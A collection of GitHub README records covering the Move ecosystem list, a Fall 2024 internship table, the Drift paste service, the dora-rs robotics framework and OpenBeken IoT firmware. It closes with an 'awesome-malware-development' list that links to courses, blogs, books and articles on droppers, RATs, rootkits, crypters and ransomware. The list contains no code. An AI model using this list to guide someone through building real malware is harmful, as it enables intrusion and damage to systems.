Deployed on Starcoin. STAR - A governance token of the Starswap dApp that powers the AMM+DEX ecosystem. Deployed on Starcoin. XUSDT - A mapped asset of USDT on Starcoin. XETH - A mapped asset of ETH on Starcoin. WEN stablecoin - Deployed on Starcoin. FAI stablecoin - An over-collateralized stable coin deployed on Starcoin.
FLY stablecoin - An implementation of forked OHM, deployed on Starcoin. Synthetic token backed by a basket containing a reserve of other tokens - From Diem. XBTC - BTC mirror asset on Aptos. XBTC - BTC mirror asset on Sui. Non-Fungible Tokens NFT examples - Multiple NFT example implementations from Sui. NFT - An ERC721-like token. Deployed on Starcoin. Merkle Airdrop - Utility for airdropping a large number of NFTs. Deployed on Starcoin. NFT - An implementation of a hybrid ERC721/ERC1155-like token. From Diem. BARS - An NFT that instantiates this hybrid standard. From Diem. MultiToken - An ERC1155-like token. From Diem. NFTGallery - Utility for holding multiple NFTs of the same type. From Diem. NFT Protocol - NFT protocol and collection framework. From OriginByte. Suia - The first POAP application on Sui. Decentralized Identity aptos-cid - Decentralized identity on Aptos, the underlying account system of ComingChat. MoveDID - MoveDID is a DID protocol that is compatible with Move-based blockchain networks, including Aptos, Sui, and Starcoin. Maintained by the NonceGeek . DeFi DeFi examples - Multiple DeFi example implementations from Sui. CoinSwap - A toy implementation of a Uniswap-like liquidity pool containing two tokens. Starswap - A Uniswap-style DEX. Deployed on Starcoin. Offer - Generic implementation of atomic swaps for any pair of assets. AptosRedPacket - A red packet social app that combines private chat and encrypted wallet on Aptos. SuiRedPacket - A red packet social app that combines private chat and encrypted wallet on Sui. AptosAMMswap - Aptos AMM Swap implemented by the OmniBTC team. SuiAMMswap - Sui AMM Swap implemented by the OmniBTC team. AptosOmniSwap - One-click swap between Aptos and EVM chains (such as ETH/BSC/AVAX, etc.) based on the cross-chain interoperability protocol Wormhole. DolaProtocol - A decentralized omnichain liquidity aggregation protocol with the single-coin pool of each public chain as the core, Wormhole, LayerZero and other cross-chain messaging protocols as the bridge, and the Sui public chain as the settlement center. ObjectMarket - A unique object trading marketplace in the Sui network. SocialFi Dmens - Decentralized Moments, a blockchain Twitter protocol built on the Sui network. On-Chain Governance ValidatorUniverse - Validator set management. Deployed on 0L. Oracle - For on-chain community voting. Deployed on 0L. DAO - For on-chain proposals and voting. Deployed on Starcoin. DiemSystem - Validator set management. From Diem. Vote - On-chain voting. From Diem. Cross-Chain Bridge Poly Bridge - The first cross-chain bridge between Move and EVM. Deployed on Starcoin. OmniBTC Bridge - A bridge between Bitcoin and Move-language public chains (like Aptos and Sui) based on an ultra-light node. Accounts Account - A generic account for Diem-powered chains. From Diem. DiemAccount - Fork of the above. From 0L. Account - Fork of the above. From Starcoin. Frameworks A Move framework is the set of Move modules included in the genesis state of the chain. These modules typically implement key concepts like accounts and currencies. The ability to separate blockchain-specific framework logic from the generic functionality of the Move language is a key part of Move's platform-agnostic design. Sui Framework Aptos Framework 0L Framework Starcoin Framework Diem Framework Libraries Move standard library - Utilities intended (but not required) to be used on every platform running Move. From the Move repo.
Move nursery - Experimental modules that may eventually be promoted into the standard library. From the Move repo. Decimal - Efficient implementation of a decimal value. From 0L. Math - Math utility functions. From Starcoin. Compare - Polymorphic comparison (i.e., compare any two Move values of the same type). From the nursery. Vault - Library for capabilities. From the nursery. ACL - Library for list-based access control. From the nursery. TaoHe - A collection of nestable Move resources. Starcoin Framework Commons - Common Move utility libraries for the starcoin-framework. From Starcoin. Movemate - Smart contract building blocks for Aptos and Sui (math utilities, governance contracts, escrow, and more). Maintained by the Pentagon team. Move cron parser - A library built for parsing cron expressions. Maintained by the Snowflake Network team. Miscellaneous Move-on-EVM - Experimental project to compile Move source code to EVM bytecode. aoc-move - Advent of Code solutions in Move with some formal verification. Tools Move Package Manager - Like cargo or npm for Move: a single CLI (and corresponding Rust APIs for other tools to hook into) for building, running, testing, debugging, and verifying Move packages . Maintained by the Move core team. Move Prover - Formal verification of user-defined specifications written in Move source code. Maintained by the Move core team. Move Read/Write Set Analyzer - Static analysis tool for computing an overapproximation of the global memory touched by a Move program. Maintained by the Move core team. Move Playground JS Library - Wraps the Move Playground by Pontem as a JavaScript library for the browser. You can use it to build your own Move Playground. go-sui-indexer - An off-fullnode service to serve data from a Sui Node. IDEs Move VS Code plugin - Maintained by the Move core team ( source code ). Move IntelliJ plugin - Maintained by the Pontem team ( source code ). Move Playground - Like Remix for Move. Alpha version of a Web IDE. See instructions . Maintained by the Pontem team. Starcoin IDE - Maintained by the Starcoin team ( source code ). Move Vim - Maintained by @rvmelkonian . move-mode - Major mode for Emacs maintained by @amnn . Package Managers Movey - A crates.io-style repository of Move packages. Wallets StarMask - A wallet for the Starcoin blockchain. Maintained by the Starcoin team ( Chrome Webstore ). Sui Wallet - A Chrome (v88+) extension wallet for Sui ( Chrome Webstore ). Pontem Wallet - Wallet extension for the Aptos network by the Pontem team ( Chrome Webstore ). Fewcha Aptos Wallet - A wallet for the layer 1 blockchain Aptos ( Chrome Webstore ). bcs-js - JavaScript implementation of the BCS serialization scheme used by Move; may be useful for implementing wallets. ComingChat - A decentralized social finance/web3 portal. Supports public chain wallets, such as Sui and Aptos wallets. Suiet Wallet - An open-source wallet for Sui ( Chrome Webstore , Website ). Ethos Wallet - Open-source Chrome extension wallet for Sui ( Chrome Webstore , Website ). Wallet Adapters Sui Wallet - Sui Wallet Adapter. Suiet Wallet - Suiet Wallet Adapter. Wallet Kits Suiet Wallet Kit - A package supporting all Sui wallets with customizable UI. Ethos Connect - UI with built-in wallet adapter and email option for supporting all wallets and wallet-less users on Sui.
SDKs Sui SDKs Rust SDK (official) TS/JS SDK (official) Golang SDK 1 (community) Golang SDK 2 (community) Python SDK (community) Java SDK (community) Kotlin SDK (community) C# SDK (community) Sui Dapps SDKs OmniSwap-Sui-SDK (community) Other network SDKs Aptos Golang SDK (community) Papers Language Design Move: A Language With Programmable Resources - This was the original Move white paper released in 2018. Many aspects of this are now out of date (e.g., the syntax and description of the bytecode instructions), but the first two sections are worth a read for explaining the difficulties of programming with assets and how Move tackles them. Robust Safety for Move The Move Borrow Checker Resources: A Safe Language Abstraction for Money Static Analysis and Verification Fast and Reliable Formal Verification of Smart Contracts with the Move Prover The Move Prover Verification of Programs Written in Libra's Move Language Exact and Linear-Time Gas-Cost Analysis Videos The Move Programming Language Move on Sui Move on Aptos Move: A Safe Language for Programming with Money - Talk from @sblackshear at the Fields Institute Blockchain research seminar series. Formal Verification of Move Programs for the Libra Blockchain - Talk from @DavidLDill at the Fields Institute Blockchain research seminar series. Move for the Masses - Talk at the Converge '22 . Slides Move deep dive Move overview - Slides from Reasoning About Financial Systems workshop at SBC '22 . Podcasts Move and Sui with Sam Blackshear from Mysten Labs Move AMA covering Move origin story Blog Posts Comparing Move and Rust smart contract development Comparing Diem-style Move and Sui Move Security Aptos-movevm Denial of Service Vulnerability Contributing Contributions welcome! Read the contribution guidelines first.;Code and content from the Move community.;awesome,awesome-list
MystenLabs/awesome-move
bsovs/Fall2024-Internships;Fall2024-Internships

Should start posting in February 2024. Collection of Fall 2024 tech internships! Shoutout to GitHub user bsovs and The Pitt CS Club for developing the initial framework and list.

Applying to internships? Autofill all your applications in a single click. Stop manually re-entering your information. Simplify’s extension helps you autofill internship applications on millions of sites. Check out SimplifyJobs list: https://simplify.jobs/l/Top-Fall-Internships

To contribute:
- Fork repository
- Edit README.md
- Open a pull request!

📈 For tips on the internship process check out the Zero to Offer program here. 📈

🤗 Contribute by submitting a pull request! 🤗

:warning: This repository is only for internships/co-ops in the United States, Canada, or for Remote positions :earth_americas:.

The List 👔

| Name | Location | Application Period | Notes |
|---|---|---|---|
| Astranis | San Francisco, CA | 🔒 Closed 🔒 | Software Developer – Intern |
| Astranis | San Francisco, CA | Open | Flight Software Engineer – Intern |
| SpaceX | 8 locations: Austin, TX; Irvine, CA; Cape Canaveral, FL; Brownsville, TX; Redmond, WA; McGregor, TX; West Athens, CA; Sunnyvale, CA | Open | Fall 2024 Software Engineering Internship/Co-op |
| Rocket Lab | Toronto, Canada | 🔒 Closed 🔒 | Software – Fall 2024 Internship |
| Relativity Space | Long Beach, CA | 🔒 Closed 🔒 | Software Engineer Intern |
| Tesla | 5 locations: Palo Alto, CA; Fremont, CA; Austin, TX; Reno, NV; Toronto, ON | 🔒 Closed 🔒 | Internship, Software Engineer, Cell Engineering |
| Amazon | 46 locations: Phoenix, AZ; Tempe, AZ; Berkeley, CA; Culver City, CA; Cupertino, CA; East Palo Alto, CA; Irvine, CA; Los Angeles, CA; Manhattan Beach, CA; Palo Alto, CA; San Diego, CA; San Francisco, CA; San Jose, CA; San Luis Obispo, CA; Santa Barbara, CA; Santa Clara, CA; Santa Cruz, CA; Santa Monica, CA; Sunnyvale, CA; Boulder, CO; Denver, CO; Atlanta, GA; Kennesaw, GA; Chicago, IL; Boston, MA; Cambridge, MA; Hudson, MA; North Reading, MA; Westborough, MA; Baltimore, MD; Detroit, MI; Minneapolis, MN; Jersey City, NJ; New York, NY; Portland, OR; Philadelphia, PA; Pittsburgh, PA; Nashville, TN; Austin, TX; Dallas, TX; Arlington, VA; Herndon, VA; Madison, WI; Bellevue, WA; Seattle, WA; Redmond, WA | 🔒 Closed 🔒 | Software Development Engineer Internship |
| Rocket Lab | Toronto, Canada | Open | Quality Engineer Intern |
| Zoox | San Mateo, CA | Open | Software Engineering Intern |

Other Semesters

- Fall 2023 - bsovs
- Fall 2022 - bsovs
- Summer 2022 - (Pitt-CSC List)
- Fall 2021

Contributors

jdkuffa <3;Collection of Fall 2023 tech internships!;internship,jobs
bsovs/Fall2024-Internships
MaxLeiter/Drift;Drift Note: This branch is where all work is being done to refactor to the Next.js 13 app directory and React Server Components. Drift is a self-hostable Gist clone. It's in beta, but is completely functional. You can try a demo at https://drift.lol. The demo is built on main but has no database, so files and accounts can be wiped at any time. If you want to contribute, need support, or want to stay updated, you can join the IRC channel at #drift on irc.libera.chat or reach me on twitter . If you don't have an IRC client yet, you can use a webclient here . Drift is built with Next.js 13, React Server Components, shadcn/ui , and Prisma . Contents: Setup Development Production Environment variables Running with pm2 Running with Docker Current status Setup Development In the root directory, run pnpm i . If you need pnpm , you can download it here . You can run pnpm dev in client for file watching and live reloading. To work with prisma , you can use pnpm prisma or pnpm exec prisma to interact with the database. Production pnpm build will produce production code. pnpm start will start the Next.js server. Environment Variables You can change these to your liking. .env : DRIFT_URL : the URL of the drift instance. DATABASE_URL : the URL to connect to your postgres instance. For example, postgresql://user:password@localhost:5432/drift . WELCOME_CONTENT : a markdown string that's rendered on the home page WELCOME_TITLE : the file title for the post on the homepage. ENABLE_ADMIN : the first account created is an administrator account REGISTRATION_PASSWORD : the password required to register an account. If not set, no password is required. NODE_ENV : defaults to development, can be production Auth environment variables Note: Only credential auth currently supports the registration password, so if you want to secure registration, you must use only credential auth. GITHUB_CLIENT_ID : the client ID for GitHub OAuth. GITHUB_CLIENT_SECRET : the client secret for GitHub OAuth. NEXTAUTH_URL : the URL of the drift instance. Not required if hosting on Vercel. CREDENTIAL_AUTH : whether to allow username/password authentication. Defaults to true . Running with pm2 It's easy to start Drift using pm2 . First, add the .env file with your values (see the above section for the required options). Then, use the following command to start the server: pnpm build && pm2 start pnpm --name drift --interpreter bash -- start Refer to pm2's docs or pm2 help for more information. 
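For reference, a minimal `.env` for local development might look like the following sketch (the values here are illustrative placeholders, not documented defaults; see the variable descriptions above):

```
DRIFT_URL=http://localhost:3000
DATABASE_URL=postgresql://user:password@localhost:5432/drift
WELCOME_TITLE=Welcome to Drift
ENABLE_ADMIN=true
CREDENTIAL_AUTH=true
NODE_ENV=development
```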
Running with Docker

Running with systemd

NOTE: We assume that you know how to enable user lingering if you don't want to use the systemd unit as root.

As root:
- Place the following systemd unit in /etc/systemd/system and name it drift.service
- Replace any occurrence of $USERNAME with the shell username of the user that will be running the Drift server

```
##########
# Drift Systemd Unit (Global)
##########

[Unit]
Description=Drift Server (Global)
After=default.target

[Service]
User=$USERNAME
Group=$USERNAME
Type=simple
WorkingDirectory=/home/$USERNAME/Drift
ExecStart=/usr/bin/pnpm start
Restart=on-failure

[Install]
WantedBy=default.target
```

As a normal user:
- Place the following systemd unit inside /home/$USERNAME/.config/systemd/user and name it drift_user.service
- Replace any occurrence of $USERNAME with the shell username of the user that will be running the Drift server

```
##########
# Drift Systemd Unit (User)
##########

[Unit]
Description=Drift Server (User)
After=default.target

[Service]
Type=simple
WorkingDirectory=/home/$USERNAME/Drift
ExecStart=/usr/bin/pnpm start
Restart=on-failure

[Install]
WantedBy=default.target
```

Current status

Drift is a work in progress. Below is a (rough) list of completed and envisioned features. If you want to help address any of them, please let me know regardless of your experience and I'll be happy to assist.

- [x] Next.js 13 app directory
- [x] creating and sharing private, public, password-protected, and unlisted posts
- [x] syntax highlighting
- [x] expiring posts
- [x] responsive UI
- [x] user auth
- [ ] SSO via HTTP header (Issue: #11)
- [x] SSO via GitHub OAuth
- [x] downloading files (individually and entire posts)
- [x] password protected posts
- [x] postgres database
- [x] administrator account / settings
- [x] docker-compose (PRs: #13, #75)
- [ ] publish docker builds
- [ ] user settings
- [ ] works enough with JavaScript disabled
- [ ] in-depth documentation
- [x] customizable homepage, so the demo can exist as-is but other instances can be built from the same source. Environment variable for the file contents?
- [ ] fleshed out API
- [ ] Swappable database backends
- [ ] More OAuth providers;Drift is a self-hostable Gist and paste service. Built with Next.js 13 and React Server Components.;gist,pastebin,pastebin-service,nodejs,nextjs,react,typescript,self-hosted,drift,nextjs13
MaxLeiter/Drift
dora-rs/dora;Website | Python API - Rust API | Guide | Discord

What is dora-rs?

Dataflow-oriented robotic application (dora-rs) is a framework that makes creation of robotic applications fast and simple. Building a robotic application can be summed up as bringing together hardware, algorithms, and AI models, and making them communicate with each other. At dora-rs, we try to:

- make integration of hardware and software easy by supporting Python, C, C++, and also ROS2.
- make communication low latency by using zero-copy Arrow messages.

dora-rs is still experimental and you might experience bugs, but we're working very hard to make it as stable as possible.

Performance

dora-rs can show impressive performance, up to 17x faster compared to the current status quo, ROS2 in Python! This is the result of using our own shared memory server and Apache Arrow to achieve zero-copy data passing. See: https://github.com/dora-rs/dora-benchmark/tree/main for reproduction.

Dataflow Paradigm

dora-rs implements a declarative dataflow paradigm where tasks are split between nodes isolated as individual processes. Each node defines its inputs and outputs to connect with other nodes.

```yaml
nodes:
  - id: webcam
    custom:
      source: webcam.py
      inputs:
        tick: dora/timer/millis/50
      outputs:
        - image

  - id: object_detection
    custom:
      source: object_detection.py
      inputs:
        image: webcam/image
      outputs:
        - bbox

  - id: plot
    custom:
      source: plot.py
      inputs:
        image: webcam/image
        bbox: object_detection/bbox
```

Nodes can either be:

- custom nodes, where dora-rs is embedded as a native library.
- runtime nodes, where dora-rs takes care of the main loop and runs user-defined operators. This makes dora-rs feature-rich, as we can run features like hot-reloading.

The dataflow paradigm has the advantage of creating an abstraction layer that makes robotic applications modular and easily configurable.

Communication

Communication between nodes is handled with shared memory on the same machine and TCP on distributed machines. Our shared memory implementation tracks messages across processes and discards them when obsolete. Shared memory slots are cached to avoid new memory allocations.

Message Format

Nodes communicate with the Apache Arrow data format. Apache Arrow is a universal memory format for flat and hierarchical data. The Arrow memory format supports zero-copy reads for lightning-fast data access without serialization overhead. It defines a C data interface without any build-time or link-time dependency requirement, which means that dora-rs has no compilation step beyond the native compiler of your favourite language.

Opentelemetry

dora-rs uses Opentelemetry to record all your logs, metrics and traces. This means that the data and telemetry can be linked using a shared abstraction. Opentelemetry is an open source observability standard that makes dora-rs telemetry collectable by most backends, such as Elasticsearch, Prometheus, Datadog, etc. Opentelemetry is language independent and backend agnostic, and it easily collects distributed data, making it perfect for dora-rs applications.

Hot-Reloading

dora-rs implements hot-reloading for Python, which means you can change code at runtime while keeping your state intact. Using the feature flag --attach --hot-reload, dora-rs watches for code changes and reloads nodes that have been modified. You can check the fail-safe mechanism at: https://github.com/dora-rs/dora/pull/239
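To give a feel for what such a node looks like in code, here is a minimal sketch of a custom Python node matching the webcam/object_detection YAML above (assuming the `dora` Python package's `Node` event-loop API; the detection logic is a placeholder):

```python
import pyarrow as pa
from dora import Node

node = Node()

# Events arrive for the inputs declared for this node in the dataflow YAML.
for event in node:
    if event["type"] == "INPUT" and event["id"] == "image":
        image = event["value"]  # zero-copy Arrow data
        # ... run object detection here (placeholder) ...
        node.send_output("bbox", pa.array([0.0, 0.0, 1.0, 1.0]))
```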
Self-Coding Robot: Code RAG (WIP)

You can easily create a self-coding robot by combining hot-reloading with a Retrieval Augmented Generation (RAG) step that generates code modifications from your prompt. See: examples/python-operator-dataflow

The self-coding robot is just the tip of the iceberg of robotics combined with LLMs that we hope to power. There is so much more that we haven't explored yet, like:

- self-debugging
- memory
- function calling
- ...

Installation

Quickest way:

```bash
cargo install dora-cli --locked
pip install dora-rs # For Python API

dora --help
```

For more info on installation, check out our guide.

Getting Started

Install the example Python dependencies:

```bash
pip install -r https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/requirements.txt
```

Get some example operators:

```bash
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/webcam.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/plot.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/utils.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/object_detection.py
wget https://raw.githubusercontent.com/dora-rs/dora/v0.3.4/examples/python-operator-dataflow/dataflow.yml
```

Start the dataflow:

```bash
dora up
dora start dataflow.yml --attach --hot-reload
```

Make sure to have a webcam.

To stop your dataflow, you can use ctrl + c.

To go further, you can add a yolov8 operator; check out our getting started here: https://www.dora-rs.ai/docs/guides/getting-started/yolov8/

ROS2 Bridge

- Compilation-free message passing to ROS 2
- Automatic conversion ROS 2 Message <-> Arrow Array

```python
import random
import pyarrow as pa

# Configuration Boilerplate...
turtle_twist_writer = ...

# Arrow-based ROS2 Twist message, which does not require a ROS2 import.
message = pa.array([{
    "linear": {
        "x": 1,
    },
    "angular": {
        "z": 1
    },
}])

turtle_twist_writer.publish(message)
```

You might want to use ChatGPT to write the Arrow formatting: https://chat.openai.com/share/4eec1c6d-dbd2-46dc-b6cd-310d2895ba15

Hardware

Cool hardware that we think might be a good fit to try out dora-rs. 🙋 We are not sponsored by the manufacturers:

| | Price | Open Source | Github | Type | Dora Project |
| --- | --- | --- | --- | --- | --- |
| DJI Robomaster S1 | 550$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover | https://huggingface.co/datasets/dora-rs/dora-robomaster |
| DJI Robomaster EP Core | 950$ | SDK | https://github.com/dji-sdk/RoboMaster-SDK | Rover, Arm | |
| DJI Tello | 100$ | | | Drone | |
| BitCraze Crazyflies | 225$ | Firmware, Lib, SDK | https://github.com/bitcraze | Drone | |
| AlexanderKoch-Koch/low_cost_robot | 250$ | Everything | https://github.com/AlexanderKoch-Koch/low_cost_robot | Arm | |
| xArm 1S | 200$ | | | Arm | |
| Wavego | 250$ | | | Quadruped | |
| AINex | 800$ | | | Humanoid | |

For more: https://docs.google.com/spreadsheets/d/1YYeW2jfOIWDVgdEgqnMvltonHquQ7K8OZCrnJRELL6o/edit#gid=0

Documentation

The full documentation is available on our website.

Discussions

Our main communication channels are:

- Our Discord server
- Our Github Project Discussion

Feel free to reach out on any topic, issues or ideas.
We also have a contributing guide.

Support Matrix

| | dora-rs | Hoped for |
| --- | --- | --- |
| Tier 1 Support | Python, Rust | C, C++, ROS 2 |
| Tier 2 Support | C, C++, ROS2 | |
| Hot-reloading | Python | Rust (https://github.com/orgs/dora-rs/discussions/360) |
| Message Format | Arrow | Native |
| Local Communication | Shared Memory | Custom Middleware, zero-copy GPU IPC, intra-process tokio::channel communication |
| Remote Communication | TCP (See: https://github.com/dora-rs/dora/issues/459) | Custom Middleware, Zenoh |
| Metrics, Tracing, and Logging | Opentelemetry | Native logging libraries into Opentelemetry |
| Data archives | Parquet (dora-record) | |
| Visualization and annotation | OpenCV | rerun.io |
| Supported Platforms (x86) | Windows, macOS, Linux | |
| Supported Platforms (ARM) | macOS, Linux | |
| Configuration | YAML | |

Unstable functionality

The dora-rs ROS2 Bridge is marked as unstable. There are a number of reasons functionality may be marked as unstable:

- We are unsure about the exact API. The name, function signature, or implementation are likely to change in the future.
- The functionality is not tested extensively yet. Bugs may pop up when used in real-world scenarios.
- The functionality does not integrate well with the full dora-rs API. You may find it works in one context but not in another.

Releasing functionality as unstable allows us to gather important feedback from users that use dora-rs in real-world scenarios. This helps us fine-tune things before giving them the final stamp of approval. Users who are only interested in solid, well-tested functionality can avoid this part of the API.

Functionality marked as unstable may change at any point without it being considered a breaking change.

License

This project is licensed under Apache-2.0. Check out NOTICE.md for more information.;DORA (Dataflow-Oriented Robotic Application) is middleware designed to streamline and simplify the creation of AI-based robotic applications. It offers low latency, composable, and distributed dataflow capabilities. Applications are modeled as directed graphs, also referred to as pipelines.;dataflow,low-latency,robotics,rust,embodied-ai
dora-rs/dora
openshwprojects/OpenBK7231T_App;Introduction

OpenBK7231T/OpenBeken is a Tasmota/Esphome replacement for new Tuya modules, featuring MQTT and Home Assistant compatibility. This repository is named "OpenBK7231T_App", but it is now a multiplatform app supporting builds for multiple separate chips:

- BK7231T (WB3S, WB2S, WB2L, etc)
- BK7231N (CB2S, CB2L, WB2L_M1, etc)
- BK7231M, a non-Tuya version of BK7231N with 00000000 keys, also sometimes in a BL2028 flavour
- T34 (T34 is based on BK7231N), see flashing trick
- BL2028N (BL2028N is a Belon version of BK7231N)
- XR809 (XR3, etc)
- BL602 (SM-028_V1.3 etc), see also BL602 flash OBK via OTA tutorial
- LF686 (flash it as BL602)
- W800 (W800-C400, WinnerMicro WiFi & Bluetooth), W801
- W600 (WinnerMicro chip), W601 (WIS600, ESP-01W, TW-02, TW-03, etc)
- LN882H by Lightning Semi - datasheet, see flashing how-to, see sample device teardown and flashing, see new flash tool, see dev board
- Windows, via simulator

Please use the automatically compiled binaries from the Releases tab. To build for a given platform yourself, first check out our version of the SDK and then check out this app repository into it; details later. See our guides in Russian: BK7231N/T34, and BL602 RGB, and a Youtube guide for BK7231/T34

If you want some generic information about BK7231 modules, available datasheets, pinout and peripherals, consult our docs topic.

Supported Devices/Templates List

Now with 500+ entries! (Get a 🏆 free SD Card 🏆 for submitting a new one!)

We have our own interactive devices database that is maintained by users. The database is also accessible from inside our firmware (but requires an internet connection to fetch). Have a device that is not listed? HELP US, submit a teardown here and 🏆 get a free SD card and gadgets set 🏆! Thanks to cooperation with Elektroda.com, if you submit a detailed teardown/article/review, we can send you this set of gadgets for free (🚚 shipping as a normal letter 🚚).

NOTE: Obviously, almost any device with a supported chip (BK7231, BL602, W600, etc.) is potentially supported, and it's not possible to list all available devices on the market, so feel free to try even if your device is not listed - we are here to help and guide you step by step!

Our Youtube Channel (See step by step guides for flashing and setup)

We have our own Youtube channel with OBK-related guides. Please see our playlists:
- flashing guides playlist
- generic setup hints, tricks, tips

You can help us by giving a like, leaving a comment and subscribing!

Features

OpenBeken features:
- Tasmota-like setup, configuration and experience on all supported platforms (supports common Tasmota JSON over http and MQTT, etc)
- OTA firmware upgrade system (for BK, W*00, BL602, LN); to use OTA, drag and drop the proper OTA file onto the OTA field on the new Web App Javascript Console
- Online builds for all platforms via Github, configurable per-user build system, also supports Docker builds
- MQTT compatibility with Home Assistant (with both Yaml generator and HA Discovery)
- Support for multiple relays, buttons, leds, inputs and PWMs, everything fully scriptable
- Driver system for custom peripherals, including TuyaMCU (see Dimmer tutorial), I2C bus and BL0942, BL0937 power metering chips, Motor Driver Bridge.
- Hardware and software I2C, supports multiple I2C devices, like the TC74 temperature sensor, MCP23017 port expander, PCF8574T LCD 2x16 (or others), etc
- Hardware and software SPI, support for SPI BL0942, etc
- NTP time from network (can be used with TH06 and other TuyaMCU devices), can run any script on a selected weekday at hour:minute:second
- Dedicated TuyaMCU support with an extra TuyaMCU analyzer tool for decoding new devices (tutorial here, code repository here)
- Support for the TuyaMCU Battery Powered devices protocol (TuyaMCU enables the WiFi module only to report the state, e.g. for door sensors, water sensors)
- RGBCW LED lighting control compatible with Home Assistant (including PWM LEDs, and SM2135, BP5758, SM15155 etc)
- LittleFS integration for scripts and large files (you can write scripts there, you can host a page there with a REST interface for controlling the device)
- Command line system for starting and configuring drivers, for controlling channels, etc
- Short startup command (up to 512 characters) storage in flash config, so you can easily init your drivers (eg. BL0942) without LittleFS
- Advanced scripting and events system (allows you to mirror Tasmota rules, for example catch button click, double click, hold)
- Easily configurable via commands (see tutorial)
- Thanks to keeping the Tasmota standard, OBK has basic compatibility with ioBroker and similar systems through TELE/STAT/CMND MQTT packets; the Tasmota Control app is also supported
- DDP lighting protocol support ("startDriver DDP" in autoexec.bat/short startup command), works with xLights
- Can be scripted to even work with shutters, see also second shutters script
- Password-protected Web security, see tutorial
- Advanced deep sleep with GPIO/timer wakeup and hybrid power save systems, fully scriptable, can be configured to last longer than Tuya
- Supports automatic GPIO setup with Tuya GPIO extraction, cloudcutter templates, can also import/export OpenBeken templates, you can also use GPIODoctor to quickly find out GPIO roles
- Advanced and custom drivers like synchronized PWM groups with configurable dead time
- WS2812B support, see scripting tutorial
- LFS and REST API allow you to create and host a custom HTML+CSS+JS page on the device with a custom GUI/display of channels/TuyaMCU dpIDs, see tutorial, see sample page, and see the final version of the custom TOMPD-63-WIFI page
- can control 'smart lab organiser drawers' with a custom Drawers driver, see full presentation
- Can run on Windows with a device simulator/schematic drawer, see tutorial
- and much more

There is also a somewhat outdated WIKI

Building

OpenBeken supports online builds for all platforms (BK7231T, BK7231N, XR809, BL602, W800), but if you want to compile it yourself, see BUILDING.md

Developer guides

- online builds system guide
- how to create a custom obk driver
- how to analyze an unknown protocol with a Saleae logic analyzer
- obk simulator short presentation

Flashing

See our GUI easy flash tool, also see FLASHING.md

Docs - MQTT topics, Console Commands, Flags, Constants, Pin Roles, Channel Types, FAQ, autoexec.bat examples

Further reading

For technical insights and generic SDK information related to Beken, WinnerMicro, Bouffalo Lab and XRadio modules, please refer to:
- https://www.elektroda.com/rtvforum/topic3850712.html
- https://www.elektroda.com/rtvforum/topic3866123.html
- https://www.elektroda.com/rtvforum/topic3806769.html

Support project

If you want to support the project, please donate at: https://www.paypal.com/paypalme/openshwprojects

Special thanks to the Tasmota/Esphome/etc contributors for making a great reference for implementing Tuya module drivers;Open source firmware (Tasmota/Esphome replacement) for BK7231T, BK7231N, BL2028N, T34, XR809, W800/W801, W600/W601 and BL602;wifi,iot,mqtt,smart-home,tuya,tasmota,bk7231,bk7231n,bk7231t,bl602
openshwprojects/OpenBK7231T_App
rootkit-io/awesome-malware-development;Introduction

This repo serves as a list of resources for malware development. Note: I am just a learner; what I am sharing may contain mistakes, and you can help me by adding things.

Essentials

I would say having some experience with C and assembly is going to be good. Some resources for C and assembly:

- C for Everyone: Programming Fundamentals
- learn-c
- C cheatsheet
- Architecture 1001: x86-64 Assembly
- x86 Assembly

Blogs

- Vitali Kremez blog - Lots of malware-related content.
- 0xPat blog - Has an amazing malware development series; I would recommend taking a look.
- zerosum0x0 blog - Some good posts.
- Guitmz blog - Dope maldev content.
- TheXcellerator - Amazing LKM rootkit series and maldev posts.

Talks

- Horse Pill: A New Type of Linux Rootkit
- Not a talk, but a good LKM rootkit series
- Good talk on Creating and Countering the Next Generation of Linux Rootkits
- Kernel Mode Threats and Practical Defenses
- Alex Ionescu - Advancing the State of UEFI Bootkits
- BlueHat v18 || Return of the kernel rootkit malware (on windows 10)

Youtube channels

- AGDC Services - HQ malware content.
- TheSphinx - Has an amazing series on writing your RAT from scratch.
- Joey Abrams - Amazing malware stuff, has a good code injection series, Linux stuff.
- w3w3w3 - Has a good LKM rootkit series.

Courses

There are some courses I would love to recommend:

- RED TEAM Operator: Malware Development Essentials course | Sektor7 - This course will teach you how to become a better ethical hacker, pentester and red teamer by learning malware development. It covers developing droppers, trojans and payload/DLL injectors using some basic C and Intel assembly skills.
- RED TEAM Operator: Malware Development Intermediate course - Advanced malware development techniques in Windows, including: API hooking, 32-/64-bit migrations, reflective binaries and more.
- RingZerø: Windows Kernel Rootkits: Techniques and Analysis - Key learnings: machine architecture for kernel programmers, virtual memory management, interrupts and exceptions, CPU security features, Windows kernel architecture, kernel components (Ps, Io, Mm, Ob, Se, Cm, etc.), system mechanisms, debugging with WinDbg, rootkit techniques, driver development.
- CodeMachine: Windows Kernel Rootkits - Topics: kernel attacks, kernel shellcoding, kernel hooking and injection, kernel callbacks, kernel filtering, kernel networking, virtualization based security.

Books

- The Art of Computer Virus Research and Defense
- The Giant Black Book of Computer Viruses
- Designing BSD Rootkits: An Introduction to Kernel Hacking
- Rootkits and Bootkits
- The Antivirus Hackers' Handbook

Free books

- Make your own first fud crypter

Articles/posts

Malware Development – Welcome to the Dark Side: Part 1 \ Art of Malware \ Malware Development Part 1 \ Basic Ransomware guide \ Understanding TRITON and the Missing Final Stage of the Attack (good read)
